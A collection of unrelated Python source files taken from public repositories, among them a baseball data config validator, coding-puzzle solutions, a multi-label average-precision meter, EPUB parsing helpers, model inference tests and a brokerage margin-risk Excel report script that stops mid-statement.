selectRowOps = ['lt', 'gt', 'le', 'ge', 'eq', 'neq']
def __init__(self, configStr = "", configObj = None):
if configObj != None:
self.config = json.loads(configStr)
elif configStr != "":
self.config = json.loads(configStr)
self.dataRepo = DatasetRepository()
self.funcs = []
self.cols = []
self.keyCols = []
def validateConfig(self):
self.loadDataset()
for t in self.config['transformations']:
self.validateTransform(t)
self.checkOutput()
return True
def validateTransform(self, trans):
if trans['type'] == 'columnSelect':
self.columnSelect(trans)
elif trans['type'] == 'rowSelect':
self.rowSelect(trans)
elif trans['type'] == 'rowSum':
self.rowSum(trans)
elif trans['type'] == 'columnDefine':
self.columnDefine(trans)
else:
raise UnknownTransformTypeException(trans['type'])
def loadDataset(self):
if('dataset' not in self.config):
raise MissingGlobalConfigItemException('dataset')
ds = self.config['dataset']
if(ds not in self.dataRepo.listDatasets()):
raise UnknownDatasetException(ds)
self.cols = self.dataRepo.getDataset(ds)['columns']
self.keyCols = self.dataRepo.getDataset(ds)['keyCols']
def checkOutput(self):
if('output' not in self.config):
raise MissingGlobalConfigItemException('output')
output = self.config['output']
if output['type'] == 'leaderboard':
self.checkLeaderboard(output)
else:
raise UnknownOutputTypeException(output['type'])
def checkLeaderboard(self, output):
directionValues = ['asc', 'desc']
if('column' not in output):
raise MissingOutputConfigItemException('column')
if('direction' not in output):
raise MissingOutputConfigItemException('direction')
if(output['column'] not in self.colnames()):
raise UnknownColumnException(output['column'])
if(output['direction'] not in directionValues):
raise UnknownLeaderboardDirectionException(output['direction'])
def rowSelect(self, trans):
col = self.getColumn(trans)
if('operator' not in trans):
raise MissingTransformConfigItemException('rowSelect', 'operator')
if(trans['operator'] not in self.selectRowOps):
raise UnknownSelectRowsOperatorException(trans['operator'])
if('criteria' not in trans):
raise MissingTransformConfigItemException('rowSelect', 'criteria')
utype = self.criType(trans['criteria'])
if(utype != col['type']):
raise RowSelectCriteriaTypeException (col['name'], col['type'], utype)
def columnSelect(self, trans):
self.cols = self.getColumns(trans)
def rowSum(self, trans):
cols = self.getColumns(trans) + self.colFilterNumeric()
self.cols = { v['name']:v for v in cols }.values()
def columnDefine(self, trans):
if('column' not in trans):
raise MissingTransformConfigItemException('columnDefine', 'column')
if('expression' not in trans):
raise MissingTransformConfigItemException('columnDefine', 'expression')
if not self.strCheck(trans['column']):
raise BadColumnNameException(trans['column'])
if trans['column'] in self.cols:
raise BadColumnNameException(trans['column'])
ev = ExpressionValidator({}, self.cols)
result = ev.validateExpression(trans['expression'])
node = result.ast.__getattribute__('value')
colDef = {'name': trans['column'], 'type': 'N' }
if node.__class__.__name__ == 'Str':
colDef['type'] = 'S'
self.cols.append(colDef)
def colnames(self):
return [ c['name'] for c in self.cols ]
def colFilter(self, colName):
return next(iter(filter(lambda c : c['name'] == colName, self.cols)))
def colFilterNumeric(self):
return filter(lambda c : c['type'] == 'N', self.cols)
def getColumn(self, trans):
if('column' not in trans):
raise MissingTransformConfigItemException(trans['type'], 'column')
if(trans['column'] not in self.colnames()):
raise UnknownColumnException(trans['column'])
return self.colFilter(trans['column'])
def getColumns(self, trans):
if('columns' not in trans):
raise MissingTransformConfigItemException(trans['type'], 'columns')
cols = []
for col in trans['columns']:
if(col not in self.colnames()):
raise UnknownColumnException(trans['column'])
cols.append(self.colFilter(col))
for col in self.keyCols:
cols.append(self.colFilter(col))
return cols
def criType(self, criteria):
matchResult = re.match(r'\d+\.?(\d+)?', criteria)
if matchResult:
return 'N'
else:
return 'S'
def strCheck(self, colName):
matchResult = re.match(r'[A-z0-9]+', colName)
if matchResult:
return True
else:
return False
class MissingGlobalConfigItemException(Exception):
def __init__(self, itemName):
super(MissingGlobalConfigItemException, self).__init__('Missing global config item {}'.format(itemName))
class MissingTransformConfigItemException(Exception):
def __init__(self, typeName, itemName):
super(MissingTransformConfigItemException, self).__init__('Missing transformation config item {} for type {}'.format(typeName, itemName))
class MissingOutputConfigItemException(Exception):
def __init__(self, itemName):
super(MissingOutputConfigItemException, self).__init__('Missing output config item {}'.format(itemName))
class UnknownColumnException(Exception):
def __init__(self, colName):
super(UnknownColumnException, self).__init__('Unknown column name {}'.format(colName))
class BadColumnNameException(Exception):
def __init__(self, colName):
super(BadColumnNameException, self).__init__('Invalid name {} for user-defined column'.format(colName))
class UnknownDatasetException(Exception):
def __init__(self, dsName):
super(UnknownDatasetException, self).__init__('Unknown dataset name {}'.format(dsName))
class UnknownSelectRowsOperatorException(Exception):
def __init__(self, opName):
super(UnknownSelectRowsOperatorException, self).__init__('Unknown operator name {}'.format(opName))
class UnknownTransformTypeException(Exception):
def __init__(self, transName):
super(UnknownTransformTypeException, self).__init__('Unknown transformation type {}'.format(transName))
class UnknownOutputTypeException(Exception):
def __init__(self, outputName):
super(UnknownOutputTypeException, self).__init__('Unknown output type {}'.format(outputName))
class UnknownLeaderboardDirectionException(Exception):
def __init__(self, givenDir):
super(UnknownOutputTypeException, self).__init__('Unknown value {} given for direction in leaderboard config'.format(givenDir))
| bryantrobbins/baseball | shared/btr3baseball/ConfigValidator.py | ConfigValidator.py | py | 7,537 | python | en | code | 22 | github-code | 50 |
29106172402 | # This problem could be solved with DFS and tracking nop/jmp with a stack
with open ('input.txt') as f:
lines = f.readlines()
attempted_fix_idx = set()
finish_dx = len(lines)
while True:
tried_fix = False
acc = 0
idx = 0
visited_idx = set()
while True:
visited_idx.add(idx)
line = lines[idx].strip().split(' ')
if line[0] == 'nop':
if idx not in attempted_fix_idx and not tried_fix:
attempted_fix_idx.add(idx)
tried_fix = True
idx += int(line[1])
else:
idx += 1
elif line[0] == 'acc':
acc += int(line[1])
idx += 1
elif line[0] == 'jmp':
if idx not in attempted_fix_idx and not tried_fix:
attempted_fix_idx.add(idx)
tried_fix = True
idx += 1
else:
idx += int(line[1])
if idx in visited_idx:
break
elif idx == finish_dx:
break
if idx == finish_dx:
break
print(acc)
| cdabella/advent_of_code | 2020/day08/day8pt2_bruteforce.py | day8pt2_bruteforce.py | py | 1,220 | python | en | code | 0 | github-code | 50 |
38656605907 | # https://leetcode.com/problems/product-of-array-except-self/?envType=study-plan-v2&envId=top-interview-150
from functools import reduce
from typing import List
class Solution:
def productExceptSelf(self, nums: List[int]) -> List[int]:
out = []
total_mult = reduce(lambda a, b: a * b, nums)
for el in nums:
if el > 0:
e = int(total_mult * (el ** -1))
else:
e = int(total_mult)
out.append(e)
return out
if __name__ == "__main__":
a = [1, 2, 3]
i = 5
print(a[i:] + a[:i]) | Litovkaa/algorithms | prod_except_self.py | prod_except_self.py | py | 592 | python | en | code | 0 | github-code | 50 |
27342003268 | import math
from urllib.request import urlretrieve
import torch
from PIL import Image
from tqdm import tqdm
import numpy as np
import random
import torch.nn.functional as F
def download_url(url, destination=None, progress_bar=True):
"""Download a URL to a local file.
Parameters
----------
url : str
The URL to download.
destination : str, None
The destination of the file. If None is given the file is saved to a temporary directory.
progress_bar : bool
Whether to show a command-line progress bar while downloading.
Returns
-------
filename : str
The location of the downloaded file.
Notes
-----
Progress bar use/example adapted from tqdm documentation: https://github.com/tqdm/tqdm
"""
def my_hook(t):
last_b = [0]
def inner(b=1, bsize=1, tsize=None):
if tsize is not None:
t.total = tsize
if b > 0:
t.update((b - last_b[0]) * bsize)
last_b[0] = b
return inner
if progress_bar:
with tqdm(unit='B', unit_scale=True, miniters=1, desc=url.split('/')[-1]) as t:
filename, _ = urlretrieve(url, filename=destination, reporthook=my_hook(t))
else:
filename, _ = urlretrieve(url, filename=destination)
class AveragePrecisionMeter(object):
"""
The APMeter measures the average precision per class.
The APMeter is designed to operate on `NxK` Tensors `output` and
`target`, and optionally a `Nx1` Tensor weight where (1) the `output`
contains model output scores for `N` examples and `K` classes that ought to
be higher when the model is more convinced that the example should be
positively labeled, and smaller when the model believes the example should
be negatively labeled (for instance, the output of a sigmoid function); (2)
the `target` contains only values 0 (for negative examples) and 1
(for positive examples); and (3) the `weight` ( > 0) represents weight for
each sample.
"""
def __init__(self, threshold=0.5, difficult_examples=False):
super(AveragePrecisionMeter, self).__init__()
self.reset()
self.difficult_examples = difficult_examples
self.threshold = threshold
def reset(self):
"""Resets the meter with empty member variables"""
self.scores = torch.FloatTensor(torch.FloatStorage())
self.targets = torch.LongTensor(torch.LongStorage())
def add(self, output, target):
"""
Args:
output (Tensor): NxK tensor that for each of the N examples
indicates the probability of the example belonging to each of
the K classes, according to the model. The probabilities should
sum to one over all classes
target (Tensor): binary NxK tensort that encodes which of the K
classes are associated with the N-th input
(eg: a row [0, 1, 0, 1] indicates that the example is
associated with classes 2 and 4)
weight (optional, Tensor): Nx1 tensor representing the weight for
each example (each weight > 0)
"""
if not torch.is_tensor(output):
output = torch.from_numpy(output)
if not torch.is_tensor(target):
target = torch.from_numpy(target)
if output.dim() == 1:
output = output.view(-1, 1)
else:
assert output.dim() == 2, \
'wrong output size (should be 1D or 2D with one column \
per class)'
if target.dim() == 1:
target = target.view(-1, 1)
else:
assert target.dim() == 2, \
'wrong target size (should be 1D or 2D with one column \
per class)'
if self.scores.numel() > 0:
assert target.size(1) == self.targets.size(1), \
'dimensions for output should match previously added examples.'
# make sure storage is of sufficient size
if self.scores.storage().size() < self.scores.numel() + output.numel():
new_size = math.ceil(self.scores.storage().size() * 1.5)
self.scores.storage().resize_(int(new_size + output.numel()))
self.targets.storage().resize_(int(new_size + output.numel()))
# store scores and targets
offset = self.scores.size(0) if self.scores.dim() > 0 else 0
self.scores.resize_(offset + output.size(0), output.size(1))
self.targets.resize_(offset + target.size(0), target.size(1))
self.scores.narrow(0, offset, output.size(0)).copy_(output)
self.targets.narrow(0, offset, target.size(0)).copy_(target)
def value(self):
"""Returns the model's average precision for each class
Return:
ap (FloatTensor): 1xK tensor, with avg precision for each class k
"""
if self.scores.numel() == 0:
return 0
ap = torch.zeros(self.scores.size(1))
rg = torch.arange(1, self.scores.size(0)).float()
# compute average precision for each class
for k in range(self.scores.size(1)):
# sort scores
scores = self.scores[:, k]
targets = self.targets[:, k]
# compute average precision
ap[k] = AveragePrecisionMeter.average_precision(scores, targets, self.difficult_examples)
return ap
@staticmethod
def average_precision(output, target, difficult_examples=True):
# sort examples
sorted, indices = torch.sort(output, dim=0, descending=True)
# Computes prec@i
pos_count = 0.
total_count = 0.
precision_at_i = 0.
for i in indices:
label = target[i]
if difficult_examples and label == 0:
continue
if label == 1:
pos_count += 1
total_count += 1
if label == 1:
precision_at_i += pos_count / total_count
precision_at_i /= pos_count
return precision_at_i
def overall(self):
if self.scores.numel() == 0:
return 0
# normalize score
scores = F.sigmoid(self.scores).cpu().numpy()
targets = self.targets.cpu().numpy()
targets[targets == -1] = 0
return self.evaluation(scores, targets)
def overall_topk(self, k):
# normalize score
targets = self.targets.cpu().numpy()
targets[targets == -1] = 0
n, c = self.scores.size()
scores = np.zeros((n, c)) - 1
index = self.scores.topk(k, 1, True, True)[1].cpu().numpy()
tmp = F.sigmoid(self.scores).cpu().numpy()
for i in range(n):
for ind in index[i]:
scores[i, ind] = 1 if tmp[i, ind] >= self.threshold else -1
return self.evaluation(scores, targets)
def evaluation(self, scores_, targets_):
n, n_class = scores_.shape
Nc, Np, Ng = np.zeros(n_class), np.zeros(n_class), np.zeros(n_class)
for k in range(n_class):
scores = scores_[:, k]
targets = targets_[:, k]
targets[targets == -1] = 0
Ng[k] = np.sum(targets == 1)
Np[k] = np.sum(scores >= self.threshold)
Nc[k] = np.sum(targets * (scores >= self.threshold))
Np[Np == 0] = 1
OP = np.sum(Nc) / np.sum(Np)
OR = np.sum(Nc) / np.sum(Ng)
OF1 = (2 * OP * OR) / (OP + OR)
CP = np.sum(Nc / Np) / n_class
CR = np.sum(Nc / Ng) / n_class
CF1 = (2 * CP * CR) / (CP + CR)
return OP, OR, OF1, CP, CR, CF1 | Robbie-Xu/CPSD | utils/util.py | util.py | py | 7,689 | python | en | code | 20 | github-code | 50 |
10418024287 | from typing import List, Union
from ebooklib.epub import Link, Section
from bs4 import BeautifulSoup, Tag, NavigableString, Comment
from typography import Title, Paragraph, TypographyList
disallowed_tags = ['[document]', 'noscript', 'header', 'html',
'meta', 'head', 'input', 'script', 'style'
'img', 'iframe', 'textarea', 'button', 'select',
'canvas', 'svg']
title_tags = ['h1', 'h2', 'h3', 'h4', 'h5', 'h6']
text_tags = ['p']
def get_links_from_toc(toc: List[Union[Link, Section]]) -> List[Link]:
links = []
def func(x):
if isinstance(x, Link):
links.append(x)
elif isinstance(x, Section):
links.append(Link(x.href, x.title))
elif isinstance(x, (tuple, list)):
for i in x:
func(i)
for item in toc:
func(item)
return links
def get_page_content(file_content, start_identifier, end_identifier) -> List[Union[Tag, NavigableString]]:
soup = BeautifulSoup(file_content, 'html.parser')
start = None
end = None
if not start_identifier:
raise Exception()
start = soup.body.find(attrs={'id': start_identifier})
if not start:
raise Exception()
if end_identifier:
end = soup.body.find(attrs={'id': end_identifier})
def clean(first_element, mode):
if mode != 'up' and mode != 'down':
raise Exception()
current = first_element
while current != soup.body.parent:
parent = current.parent
index_current = parent.contents.index(current)
if mode == 'up':
del(parent.contents[:index_current])
else:
if current == first_element:
del(parent.contents[index_current:])
else:
del(parent.contents[index_current + 1:])
current = parent
clean(start, 'up')
if end:
clean(end, 'down')
return soup.body.contents
def parse_content(content: List[Union[Tag, NavigableString]]) -> TypographyList:
text_list = []
def func(x):
if isinstance(x, Comment):
pass
elif isinstance(x, NavigableString):
text = x.strip()
if text:
text_list.append(Paragraph(text=text))
elif isinstance(x, Tag):
if x.name in title_tags:
text = x.get_text().strip()
if text:
text_list.append(Title(text=text))
elif x.name in text_tags:
text = x.get_text().strip()
if text:
text_list.append(Paragraph(text=text))
elif x.name in disallowed_tags:
pass
else:
for i in x.contents:
func(i)
for item in content:
func(item)
return TypographyList(text_list)
| c4rls/projeto-integrador | projeto_integrador/utils.py | utils.py | py | 2,933 | python | en | code | 1 | github-code | 50 |
73407137754 | '''
args - argumentos nao nomeados
serve pra colocar a quantidade de argumentos que vc quiser,
msm q ainda não estejam definidos
* - *args (empacotamento e desempacotamento)
'''
def soma(*args):
total = 0
for numero in args:
print('Total', total, numero)
total += numero
print('Total', total)
numeros = 1, 2, 3, 4, 5, 6, 7, 8 # isso é uma tupla
outra_soma = soma(*numeros)
print(outra_soma) # é preciso primeiro desempacotar a tupla para poder executar a soma,
# pois a tupla se comporta como uma só iteravel
soma(1,2,3,4,5,6,7,8)
print(sum((numeros))) | Enzslv4/Pythoncurso1 | aula71.py | aula71.py | py | 591 | python | pt | code | 0 | github-code | 50 |
7857087798 | import os
import discord
import asyncio
from replit import db
from datetime import date
# from dotenv import load_dotenv
# from ds import *
# load_dotenv()
TOKEN = os.environ["DISCORD_TOKEN"]
prefix = ":V"
bot = discord.Client()
print("running")
#db functions
def addDB(cat, item):
pass
# -----------------------
def emb(t,desc="", col = 0x3AABC2):
embedVar = discord.Embed(title=t, description=desc, color=col)
return embedVar
@bot.event
async def on_ready():
print(f'Logged in as {bot.user} (ID: {bot.user.id})')
activity = discord.Game(name=f"Disco-Life | {prefix} help", type=3)
await bot.change_presence(status=discord.Status.online, activity=activity)
@bot.event
async def on_message(message):
if message.author == bot.user:
return
else:
if bot.user.mentioned_in(message):
try:
user = db["life"]["disco_users"][message.author.id]
except KeyError:
await message.channel.send(f"You're a new face! `{prefix}start` to play or `{prefix} help` for info. {message.author.mention}")
else:
await message.channel.send(f"You can use ``` {prefix} help ``` for info! {message.author.mention}")
con1 = message.content
if con1.startswith(f"{prefix.lower()} ") or con1.startswith(f"{prefix} "):
con = con1.split(" ", 1)
con = con[1]
if con == "quittt":
await message.channel.send("``` shutting down ```")
exit()
elif con == "ping":
await message.channel.send("pong!")
elif con == "help":
e=emb(f"**For more info:** ` {prefix} help [command] `", f"**Add ` {prefix} ` before any command**")
e.set_author(name="Commands", url="", icon_url="https://image.freepik.com/free-vector/blue-pencil-with-pixel-art-style_475147-504.jpg")
def em(a, b, c=""):
st = ""
for s in b:
st += f"`{s}`, "
st= st[:-2] + st[-1:]
return e.add_field(name=chr(173) + "\n" + chr(173) + a,value=f"{st} {c}", inline=False)
em(":bookmark: Profile commands :bookmark:", ("start", "profile", "attributes", "boosts", "events", "likes", "inventory", "cooldowns"))
em(":beginner: Menu commands :beginner:", ("bank", "shop", "jobs", "education", "health", "apartments", "relationship"))
em(":gift: Rewards commands :gift:", ("daily", "weekly", "votetrend", "checkin", "redeem", "quiz"))
em(":currency_exchange: Interaction commands :currency_exchange:", ("mail", "give", "phone"))
em(":diamonds: Misc commands :diamonds:", ("action", "gameplayinfo", "rules", "noticeboard", "invite","msgdev"))
await message.channel.send(embed=e)
elif con == 'start':
u = user = message.author
try:
user = db["life"]["disco_users"][user.id]
except KeyError:
msg = await message.channel.send(f">>> [ boots up ]\n\nYou want to play Disco-Life! \nCheck out gameplayinfo,\nMake sure you have read and\naccepted the rules .\nThen react with :thumbsup: !\n\n`{prefix.lower()} gameplayinfo`, `{prefix.lower()} rules`")
await msg.add_reaction(emoji="\N{THUMBS UP SIGN}")
# had an error for so long because of typing - ch(user, reaction) here :(
def ch(reaction, user):
return user == u and str(reaction) == "\N{THUMBS UP SIGN}" and reaction.message == msg
try:
r = await bot.wait_for("reaction_add", timeout=25.0, check = ch)
del r
except asyncio.exceptions.TimeoutError:
await message.channel.send("`TimeOutError`")
else:
del msg
msg = f"Hello {message.author.name}.\nI work for Discorp inc. And you are a product of our project Disco-Life!\nNow we intend to observe how you live in Disco-Verse, i hope you are ready!"
today = date.today().strftime("%d-%m-%Y")
e =emb("[New] Text Message ", f"`{str(today)}`\n\n" + msg)
e.set_author(name = "Agent Disco", url = "", icon_url = "http://clipart-library.com/image_gallery/n829721.jpg")
await message.channel.send(embed=e)
else:
await message. channel.send("`Err : Invalid command.`")
bot.run(TOKEN)
| p-r-o-m-e/-DISCONTINUED-Python_discordBot2 | main.py | main.py | py | 4,630 | python | en | code | 0 | github-code | 50 |
42880387454 | class Solution:
def minSubArrayLen(self, target: int, nums: List[int]) -> int:
s, i = 0, 0
n = len(nums)
res = inf
for j in range(n):
s += nums[j]
while s >= target:
res = min(res, j - i + 1)
s -= nums[i]
i += 1
return res if res != inf else 0
# 209 follow-up: 862. what if the numbers can be negative? monostack
class Solution:
def shortestSubarray(self, nums: List[int], k: int) -> int:
dq = collections.deque([(0, -1)])
n = len(nums)
s = 0
res = n + 1
for j in range(n):
s += nums[j]
while dq and dq[0][0] <= s - k:
res = min(res, j - dq.popleft()[1])
while dq and dq[-1][0] >= s:
dq.pop()
dq.append((s, j))
return res if res != n + 1 else -1
| MengSunS/daily-leetcode | two_pointers/209.py | 209.py | py | 976 | python | en | code | 0 | github-code | 50 |
25156563766 | import torch
import numpy as np
from time import sleep
from ai.model import Model, fc
from ai.infer import Inferencer
def test_inferencer():
model = Model(fc(8, 8)).init().eval()
inferencer = Inferencer(model, batch_size=1)
assert_parity(model, inferencer)
def test_param_update():
model = Model(fc(8, 8)).init().eval()
inferencer = Inferencer(model, batch_size=1)
# reinitialize model params and send to inferencer
model.init()
inferencer.update_params(model.state_dict())
sleep(2)
assert_parity(model, inferencer)
def test_batching():
model = Model(fc(8, 8)).init().eval()
inferencer = Inferencer(model, batch_size=8, debug=True)
inputs = [torch.randn(1, 8) for _ in range(16)]
with torch.no_grad():
gt = [model(x) for x in inputs]
outputs = inferencer.multi_infer([([inputs[i]], {}) for i in range(16)])
for y1, y2 in zip(outputs, gt):
assert close(y1, y2)
info = inferencer.debug()
print(info)
assert info['avg_batch_size'] > 1
def assert_parity(model, inferencer):
x = torch.randn(1, 8)
with torch.no_grad():
y1 = model(x)
y2 = inferencer(x)
assert close(y1, y2)
def close(a, b):
return np.allclose(a.numpy(), b.numpy(), rtol=1e-4, atol=1e-6)
| calvinpelletier/ai | tests/infer/test_inferencer.py | test_inferencer.py | py | 1,283 | python | en | code | 0 | github-code | 50 |
17678326104 | from automation.risk_management import *
def run( # chạy hàng ngày
run_time = dt.datetime.now()
):
start = time.time()
info = get_info('daily',run_time)
period = info['period']
dataDate = info['end_date']
folder_name = info['folder_name']
# create folder
if not os.path.isdir(join(dept_folder,folder_name,period)):
os.mkdir((join(dept_folder,folder_name,period)))
###################################################
###################################################
###################################################
# list các tài khoản nợ xấu cố định và loại bỏ thêm 1 tài khoản tự doanh
badDebtAccounts = {
'022C078252',
'022C012620',
'022C012621',
'022C012622',
'022C089535',
'022C089950',
'022C089957',
'022C050302',
'022C006827',
'022P002222',
}
detailTable = pd.read_sql(
f"""
WITH
[BranchTable] AS (
SELECT DISTINCT
[relationship].[account_code],
[branch].[branch_name]
FROM [relationship]
LEFT JOIN [branch] ON [relationship].[branch_id] = [branch].[branch_id]
WHERE [relationship].[date] = '{dataDate}'
),
[LoanTable] AS (
SELECT
[BranchTable].[branch_name] [Location],
[margin_outstanding].[account_code] [Custody],
SUM([principal_outstanding]) [OriginalLoan],
SUM([interest_outstanding]) [Interest],
SUM([principal_outstanding])+SUM([interest_outstanding])+SUM([fee_outstanding]) [TotalLoan]
FROM [margin_outstanding]
LEFT JOIN [BranchTable]
ON [margin_outstanding].[account_code] = [BranchTable].[account_code]
WHERE [margin_outstanding].[date] = '{dataDate}'
AND [margin_outstanding].[type] IN (N'Margin', N'Trả chậm', N'Bảo lãnh')
AND [margin_outstanding].[account_code] NOT IN {iterable_to_sqlstring(badDebtAccounts)}
GROUP BY [BranchTable].[branch_name], [margin_outstanding].[account_code]
),
[CashMargin] AS (
SELECT
[rmr0062].[account_code] [Custody],
SUM([rmr0062].[cash]) [CashAndPIA],
SUM([rmr0062].[margin_value]) [MarginValue]
FROM [rmr0062]
WHERE [rmr0062].[date] = '{dataDate}' AND [rmr0062].[loan_type] = 1
GROUP BY [rmr0062].[account_code]
),
[Asset] AS (
SELECT
[sub_account].[account_code] [Custody],
SUM([rmr0015].[market_value]) [TotalAssetValue]
FROM [rmr0015]
LEFT JOIN [sub_account]
ON [sub_account].[sub_account] = [rmr0015].[sub_account]
WHERE [rmr0015].[date] = '{dataDate}'
GROUP BY [account_code]
),
[MidResult] AS (
SELECT
[LoanTable].*,
ISNULL([CashMargin].[CashAndPIA],0) [CashAndPIA],
ISNULL([CashMargin].[MarginValue],0) [MarginValue],
ISNULL([Asset].[TotalAssetValue],0) [TotalAssetValue],
CASE
WHEN ISNULL([CashMargin].[CashAndPIA],0) > [LoanTable].[TotalLoan] THEN 100
WHEN ISNULL([CashMargin].[MarginValue],0) = 0 THEN 0
ELSE (1 - ([LoanTable].[TotalLoan] - [CashMargin].[CashAndPIA]) / [CashMargin].[MarginValue]) * 100
END [MMRMA],
CASE
WHEN ISNULL([CashMargin].[CashAndPIA],0) > [LoanTable].[TotalLoan] THEN 100
WHEN ISNULL([Asset].[TotalAssetValue],0) = 0 THEN 0
ELSE (1 - ([LoanTable].[TotalLoan] - [CashMargin].[CashAndPIA]) / [Asset].[TotalAssetValue]) * 100
END [MMRTA],
'' [Note]
FROM [LoanTable]
LEFT JOIN [CashMargin] ON [LoanTable].[Custody] = [CashMargin].[Custody]
LEFT JOIN [Asset] ON [LoanTable].[Custody] = [Asset].[Custody]
)
SELECT
ROW_NUMBER() OVER (ORDER BY [MidResult].[MMRTA],[MidResult].[MMRMA]) [No.],
[MidResult].*,
CASE
WHEN [MidResult].[MMRTA] BETWEEN 80 AND 100 THEN '[80-100]'
WHEN [MidResult].[MMRTA] BETWEEN 75 AND 80 THEN '[75-80]'
WHEN [MidResult].[MMRTA] BETWEEN 70 AND 75 THEN '[70-75]'
WHEN [MidResult].[MMRTA] BETWEEN 65 AND 70 THEN '[65-70]'
WHEN [MidResult].[MMRTA] BETWEEN 60 AND 65 THEN '[60-65]'
WHEN [MidResult].[MMRTA] BETWEEN 55 AND 60 THEN '[55-60]'
WHEN [MidResult].[MMRTA] BETWEEN 50 AND 55 THEN '[50-55]'
WHEN [MidResult].[MMRTA] BETWEEN 45 AND 50 THEN '[45-50]'
WHEN [MidResult].[MMRTA] BETWEEN 40 AND 45 THEN '[40-45]'
WHEN [MidResult].[MMRTA] BETWEEN 35 AND 40 THEN '[35-40]'
WHEN [MidResult].[MMRTA] BETWEEN 30 AND 35 THEN '[30-35]'
WHEN [MidResult].[MMRTA] BETWEEN 25 AND 30 THEN '[25-30]'
WHEN [MidResult].[MMRTA] BETWEEN 20 AND 25 THEN '[20-25]'
WHEN [MidResult].[MMRTA] BETWEEN 15 AND 20 THEN '[15-20]'
WHEN [MidResult].[MMRTA] BETWEEN 10 AND 15 THEN '[10-15]'
ELSE '[00-10]'
END [Group]
FROM [MidResult]
WHERE [MidResult].[OriginalLoan] <> 0
ORDER BY [MidResult].[MMRTA],[MidResult].[MMRMA]
""",
connect_DWH_CoSo
)
summaryTable = detailTable.groupby('Group')['OriginalLoan'].agg(['count','sum'])
groupsMapper = {
'[00-10]':'Market Pressure < 10%',
'[10-15]':'10%<=Market Pressure < 15%',
'[15-20]':'15%<=Market Pressure < 20%',
'[20-25]':'20%<=Market Pressure < 25%',
'[25-30]':'25%<=Market Pressure < 30%',
'[30-35]':'30%<=Market Pressure < 35%',
'[35-40]':'35%<=Market Pressure < 40%',
'[40-45]':'40%<=Market Pressure < 45%',
'[45-50]':'45%<=Market Pressure < 50%',
'[50-55]':'50%<=Market Pressure < 55%',
'[55-60]':'55%<=Market Pressure < 60%',
'[60-65]':'60%<=Market Pressure < 65%',
'[65-70]':'65%<=Market Pressure < 70%',
'[70-75]':'70%<=Market Pressure < 75%',
'[75-80]':'75%<=Market Pressure < 80%',
'[80-100]':'Market Pressure >= 80%'
}
summaryTable = summaryTable.reindex(groupsMapper.keys()).fillna(0).reset_index()
summaryTable['Group'] = summaryTable['Group'].map(groupsMapper)
summaryTable = summaryTable.rename({'count':'AccountNumber','sum':'Outstanding'},axis=1)
summaryTable['Outstanding'] /= 1000000
summaryTable['Proportion'] = summaryTable['Outstanding'] / summaryTable['Outstanding'].sum() * 100
###################################################
###################################################
###################################################
t0_day = dataDate[-2:]
t0_month = calendar.month_name[int(dataDate[5:7])]
t0_year = dataDate[0:4]
file_name = f'RMD_Market Pressure _end of {t0_day}.{t0_month} {t0_year}.xlsx'
writer = pd.ExcelWriter(
join(dept_folder,folder_name,period,file_name),
engine='xlsxwriter',
engine_kwargs={'options':{'nan_inf_to_errors':True}}
)
workbook = writer.book
###################################################
###################################################
###################################################
# Sheet Summary
cell_format = workbook.add_format(
{
'bold': True,
'align': 'center',
'valign': 'vbottom',
'font_size': 12,
'font_name': 'Calibri'
}
)
title_red_format = workbook.add_format(
{
'bold': True,
'align': 'center',
'valign': 'vbottom',
'font_size': 12,
'font_name': 'Calibri',
'color': '#FF0000'
}
)
subtitle_1_format = workbook.add_format(
{
'bold': True,
'italic': True,
'align': 'center',
'valign': 'vcenter',
'font_size': 11,
'font_name': 'Calibri'
}
)
subtitle_1_color_format = workbook.add_format(
{
'bold': True,
'italic': True,
'align': 'center',
'valign': 'vcenter',
'font_size': 11,
'font_name': 'Calibri',
'color': '#FF0000'
}
)
subtitle_2_format = workbook.add_format(
{
'bold': True,
'align': 'left',
'valign': 'vbottom',
'font_size': 11,
'font_name': 'Calibri'
}
)
headers_format = workbook.add_format(
{
'bold': True,
'text_wrap':True,
'border':1,
'align': 'center',
'valign': 'vcenter',
'font_size': 11,
'font_name': 'Calibri'
}
)
text_left_merge_format = workbook.add_format(
{
'border': 1,
'align': 'left',
'valign': 'vcenter',
'font_size': 11,
'font_name': 'Calibri'
}
)
text_left_format = workbook.add_format(
{
'border':1,
'align': 'left',
'valign': 'vbottom',
'font_size': 11,
'font_name': 'Calibri'
}
)
text_left_color_format = workbook.add_format(
{
'border': 1,
'bold':True,
'align': 'left',
'valign': 'vbottom',
'font_size': 11,
'font_name': 'Calibri',
'color': '#FF0000'
}
)
num_right_format = workbook.add_format(
{
'border': 1,
'align': 'right',
'valign': 'vcenter',
'font_size': 11,
'font_name': 'Calibri',
'num_format': '0'
}
)
sum_format = workbook.add_format(
{
'bold':True,
'border': 1,
'align': 'right',
'valign': 'vbottom',
'font_size': 11,
'font_name': 'Calibri',
'num_format': '#,##0'
}
)
money_normal_format = workbook.add_format(
{
'border': 1,
'align': 'right',
'valign': 'vcenter',
'font_size': 11,
'font_name': 'Calibri',
'num_format':'_(* #,##0_);_(* (#,##0);_(* "-"??_);_(@_)'
}
)
money_small_format = workbook.add_format(
{
'border': 1,
'align': 'right',
'valign': 'vcenter',
'font_size': 11,
'font_name': 'Calibri',
'num_format': '_(* #,##0.00_);_(* (#,##0.00);_(* "-"??_);_(@_)'
}
)
percent_format = workbook.add_format(
{
'border': 1,
'align': 'right',
'valign': 'vcenter',
'font_size': 11,
'font_name': 'Calibri',
'num_format': '0.00'
}
)
headers = [
'Criteria',
'No of accounts',
'Outstanding',
'% Total Oustanding'
]
subtitle_1 = f'Data is as at end {t0_day}.{t0_month} {t0_year} (it is not inculde 08 accounts that belong to Accumulated Negative Value)'
subtitle_2 = 'C. Market Pressure (%) is used to indicate the breakeven point of loan with assumption that whole portfolio may drop at same percentage.'
summary_sheet = workbook.add_worksheet('Summary')
summary_sheet.hide_gridlines(2)
summary_sheet.set_column('A:A',31)
summary_sheet.set_column('B:B',15)
summary_sheet.set_column('C:C',14)
summary_sheet.set_column('D:D',11)
summary_sheet.set_column('E:E',19)
summary_sheet.set_column('F:F',21)
summary_sheet.set_column('G:G',18,options={'hidden':1})
summary_sheet.merge_range('A1:I1','',cell_format)
summary_sheet.write_rich_string(
'A1','SUMMARY RISK REPORT FOR ',title_red_format,'Market Pressure (%)',cell_format
)
summary_sheet.merge_range('A2:F2',subtitle_1,subtitle_1_format)
summary_sheet.merge_range('A3:F3','',cell_format)
summary_sheet.write_rich_string(
